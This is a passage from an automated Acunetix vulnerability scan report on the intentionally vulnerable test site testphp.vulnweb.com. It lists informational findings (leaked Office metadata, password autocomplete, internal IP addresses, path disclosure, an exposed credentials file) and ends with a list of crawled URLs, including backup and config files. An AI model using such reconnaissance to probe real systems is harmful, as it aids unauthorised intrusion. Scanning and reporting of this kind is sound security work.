Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
176
Microsoft Office possible sensitive information
Severity Informational
Reported by module /Scripts/PerFile/Text_Search_File.script
Description
This document has been converted to HTML using Microsoft Office. It seems that Office has included sensitive information
during the conversion.
Impact
Possible sensitive information disclosure that may help an attacker to conduct social engineering attacks.
Recommendation
Inspect the source code of this document and remove the sensitive information.
References
Affected items
/secured/office.htm
Details
Pattern found:
<o:DocumentProperties>
<o:Author>Acunetix</o:Author>
<o:LastAuthor>Acunetix</o:LastAuthor>
<o:Revision>1</o:Revision>
<o:TotalTime>0</o:TotalTime>
<o:Created>2005-04-05T11:44:00Z</o:Created>
<o:LastSaved>2005-04-05T11:44:00Z</o:LastSaved>
<o:Pages>1</o:Pages>
<o:Words>5</o:Words>
<o:Characters>30</o:Characters>
<o:Company>Acunetix</o:Company>
<o:Lines>1</o:Lines>
<o:Paragraphs>1</o:Paragraphs>
<o:CharactersWithSpaces>34</o:CharactersWithSpaces>
<o:Version>11.6360</o:Version>
</o:DocumentProperties>
177
Request headers
GET /secured/office.htm HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
Severity Informational
Reported by module /Crawler/12-Crawler_Password_Input_Autocomplete.js
Description
When a new name and password is entered in a form and the form is submitted, the browser asks if the password should
be saved.Thereafter when the form is displayed, the name and password are filled in automatically or are completed as the
name is entered. An attacker with local access could obtain the cleartext password from the browser cache.
Impact
Recommendation
Affected items
Web Server
Details
178
Form name: form1
Form action: /secured/newuser.php
Form method: POST
Form input:
upass [password]
Request headers
GET /signup.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
Web Server
Details
Form name: loginform
Form action: userinfo.php
Form method: POST
Form input:
pass [password]
Request headers
179
GET /login.php HTTP/1.1
Host: testphp.vulnweb.com
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
X-WVS-ID: Acunetix-LSR/65535
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,app
lication/signed-exchange;v=b3
Referer: http://testphp.vulnweb.com/
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
Severity Informational
Reported by module /Scripts/PerFile/Text_Search_File.script
Description
A string matching an internal IPv4 address was found on this page. This may disclose information about the IP addressing
scheme of the internal network. This information can be used to conduct further attacks.
Impact
Recommendation
Affected items
/404.php
Details
180
Pattern found:
192.168.0.28
Request headers
GET /404.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/pictures/ipaddresses.txt
Details
Pattern found:
192.168.0.26
Request headers
181
GET /pictures/ipaddresses.txt HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/secured/phpinfo.php
Details
Pattern found:
192.168.0.5
Request headers
GET /secured/phpinfo.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
182
Severity Informational
Reported by module /Scripts/PerFile/Text_Search_File.script
Description
One or more fully qualified path names were found on this page. From this information the attacker may learn the file
system structure from the web server. This information can be used to conduct further attacks.
Impact
Recommendation
References
Affected items
/pictures/path-disclosure-unix.html
Details
Pattern found:
>/usr/local/etc/httpd/htdocs2/destination
Request headers
GET /pictures/path-disclosure-unix.html HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/secured/phpinfo.php
183
Details
Pattern found:
:/usr/obj/usr/src/sys/GENERIC
Request headers
GET /secured/phpinfo.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
Severity Informational
Reported by module /Scripts/PerFile/Text_Search_File.script
Description
A username and/or password was found in this file. This information could be sensitive.
Impact
Recommendation
Remove this file from your website or change its permissions to remove access.
Affected items
/pictures/credentials.txt
Details
184
Pattern found:
password=something
Request headers
GET /pictures/credentials.txt HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
185
Scanned items (coverage report)
http://testphp.vulnweb.com/
http://testphp.vulnweb.com/.idea/
http://testphp.vulnweb.com/.idea/.name
http://testphp.vulnweb.com/.idea/acuart.iml
http://testphp.vulnweb.com/.idea/encodings.xml
http://testphp.vulnweb.com/.idea/misc.xml
http://testphp.vulnweb.com/.idea/modules.xml
http://testphp.vulnweb.com/.idea/scopes/
http://testphp.vulnweb.com/.idea/scopes/scope_settings.xml
http://testphp.vulnweb.com/.idea/vcs.xml
http://testphp.vulnweb.com/.idea/workspace.xml
http://testphp.vulnweb.com/_mmServerScripts/
http://testphp.vulnweb.com/_mmServerScripts/MMHTTPDB.php
http://testphp.vulnweb.com/_mmServerScripts/mysql.php
http://testphp.vulnweb.com/404.php
http://testphp.vulnweb.com/admin/
http://testphp.vulnweb.com/admin/create.sql
http://testphp.vulnweb.com/AJAX/
http://testphp.vulnweb.com/AJAX/artists.php
http://testphp.vulnweb.com/AJAX/categories.php
http://testphp.vulnweb.com/AJAX/htaccess.conf
http://testphp.vulnweb.com/AJAX/index.php
http://testphp.vulnweb.com/AJAX/infoartist.php
http://testphp.vulnweb.com/AJAX/infocateg.php
http://testphp.vulnweb.com/AJAX/infotitle.php
http://testphp.vulnweb.com/AJAX/showxml.php
http://testphp.vulnweb.com/AJAX/styles.css
http://testphp.vulnweb.com/AJAX/titles.php
http://testphp.vulnweb.com/artists.php
http://testphp.vulnweb.com/bxss/
http://testphp.vulnweb.com/bxss/adminPan3l/
http://testphp.vulnweb.com/bxss/adminPan3l/index.php
http://testphp.vulnweb.com/bxss/adminPan3l/style.css
http://testphp.vulnweb.com/bxss/cleanDatabase.php
http://testphp.vulnweb.com/bxss/database_connect.php
http://testphp.vulnweb.com/bxss/index.php
http://testphp.vulnweb.com/bxss/test.js
http://testphp.vulnweb.com/bxss/vuln.php
http://testphp.vulnweb.com/cart.php
http://testphp.vulnweb.com/categories.php
http://testphp.vulnweb.com/clearguestbook.php
http://testphp.vulnweb.com/clientaccesspolicy.xml
http://testphp.vulnweb.com/comment.php
http://testphp.vulnweb.com/Connections/
http://testphp.vulnweb.com/Connections/DB_Connection.php
http://testphp.vulnweb.com/crossdomain.xml
http://testphp.vulnweb.com/CVS/
http://testphp.vulnweb.com/CVS/Entries
http://testphp.vulnweb.com/CVS/Entries.Log
http://testphp.vulnweb.com/CVS/Repository
http://testphp.vulnweb.com/CVS/Root
http://testphp.vulnweb.com/database_connect.php
http://testphp.vulnweb.com/disclaimer.php
http://testphp.vulnweb.com/Flash/
http://testphp.vulnweb.com/Flash/add.fla
http://testphp.vulnweb.com/Flash/add.swf
http://testphp.vulnweb.com/guestbook.php
http://testphp.vulnweb.com/hpp/
186
http://testphp.vulnweb.com/hpp/index.php
http://testphp.vulnweb.com/hpp/params.php
http://testphp.vulnweb.com/hpp/test.php
http://testphp.vulnweb.com/images/
http://testphp.vulnweb.com/index.bak
http://testphp.vulnweb.com/index.php
http://testphp.vulnweb.com/index.zip
http://testphp.vulnweb.com/listproducts.php
http://testphp.vulnweb.com/login.php
http://testphp.vulnweb.com/logout.php
http://testphp.vulnweb.com/medias/
http://testphp.vulnweb.com/medias/css/
http://testphp.vulnweb.com/medias/css/main.css
http://testphp.vulnweb.com/medias/img/
http://testphp.vulnweb.com/medias/js/
http://testphp.vulnweb.com/medias/js/common_functions.js
http://testphp.vulnweb.com/Mod_Rewrite_Shop/
http://testphp.vulnweb.com/Mod_Rewrite_Shop/.htaccess
http://testphp.vulnweb.com/Mod_Rewrite_Shop/buy.php
http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/
http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php
http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/
http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/
http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3/
http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/
http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/
http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/
http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/
http://testphp.vulnweb.com/Mod_Rewrite_Shop/images/
http://testphp.vulnweb.com/Mod_Rewrite_Shop/index.php
http://testphp.vulnweb.com/Mod_Rewrite_Shop/rate.php
http://testphp.vulnweb.com/Mod_Rewrite_Shop/RateProduct-3.html
http://testphp.vulnweb.com/pictures/
http://testphp.vulnweb.com/pictures/1.jpg.tn
http://testphp.vulnweb.com/pictures/2.jpg.tn
http://testphp.vulnweb.com/pictures/3.jpg.tn
http://testphp.vulnweb.com/pictures/4.jpg.tn
http://testphp.vulnweb.com/pictures/5.jpg.tn
http://testphp.vulnweb.com/pictures/6.jpg.tn
http://testphp.vulnweb.com/pictures/7.jpg.tn
http://testphp.vulnweb.com/pictures/8.jpg.tn
http://testphp.vulnweb.com/pictures/credentials.txt
http://testphp.vulnweb.com/pictures/ipaddresses.txt
http://testphp.vulnweb.com/pictures/path-disclosure-unix.html
http://testphp.vulnweb.com/pictures/path-disclosure-win.html
http://testphp.vulnweb.com/pictures/wp-config.bak
http://testphp.vulnweb.com/pictures/WS_FTP.LOG
http://testphp.vulnweb.com/privacy.php
http://testphp.vulnweb.com/product.php
http://testphp.vulnweb.com/search.php
http://testphp.vulnweb.com/secured/
http://testphp.vulnweb.com/secured/database_connect.php
http://testphp.vulnweb.com/secured/index.php
http://testphp.vulnweb.com/secured/newuser.php
http://testphp.vulnweb.com/secured/office.htm
http://testphp.vulnweb.com/secured/office_files/
http://testphp.vulnweb.com/secured/office_files/filelist.xml
http://testphp.vulnweb.com/secured/phpinfo.php
http://testphp.vulnweb.com/secured/style.css
http://testphp.vulnweb.com/sendcommand.php
http://testphp.vulnweb.com/showimage.php
187
http://testphp.vulnweb.com/signup.php
http://testphp.vulnweb.com/style.css
http://testphp.vulnweb.com/Templates/
http://testphp.vulnweb.com/Templates/logout.php
http://testphp.vulnweb.com/Templates/main_dynamic_template.dwt.php
http://testphp.vulnweb.com/userinfo.php
http://testphp.vulnweb.com/wvstests/
http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19/
http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19/scripts/
http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19/scripts/version.php
188